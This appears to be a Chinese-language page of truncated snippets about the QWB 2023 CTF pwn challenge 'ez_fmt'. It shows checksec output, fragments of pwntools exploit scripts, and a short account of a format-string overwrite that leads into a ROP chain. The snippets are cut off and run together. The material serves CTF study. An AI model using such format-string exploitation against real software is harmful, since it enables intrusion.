1.[强网杯2023] 强网先锋 ez_fmt 详解2023-12-192.[CISCN2024]华中半决赛 PWN部分题解2024-06-253.protobuf pwn题专项2024-08-034.初探MIPS PWN2024-08-10 收起 题目详解 查看保护机制,地址随机化未开启 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: No PIE ...
exp先放着,想自己调试理解的可以看看。 frompwnimport*context(terminal=['tmux','splitw','-h'],os="linux",arch="amd64",# arch = "i386",log_level="debug",)io=process('./ez_fmt')defdebug():gdb.attach(io,''' ni#这里是让gdb自动下一步,这样可以直接看到输入后的情况。 ''')debug()...
context.log_level = 'debug'context.arch='amd64' #sh = remote('2.2.2.2',1337)#sh = gdb.debug('./ez_fmt','b main')sh = process('./ez_fmt')elf = ELF('./ez_fmt')got_libc_startmain = elf.got['__libc_start_main'] recv1 = sh.recvline()stack_addr = int(recv1[24:38],...
io.interactive() ez_fmt 格式化字符串打printf的返回地址为csu的部分gadget,然后执行跳转magic_read(0x401205)执行rop链。 #!/usr/bin/env python3 ''' Author:7resp4ss Date:2023-12-16 13:34:34 Usage: Debug : python3 exp.py debug elf-file-path -t -b malloc Remote: python3 exp.py remote ...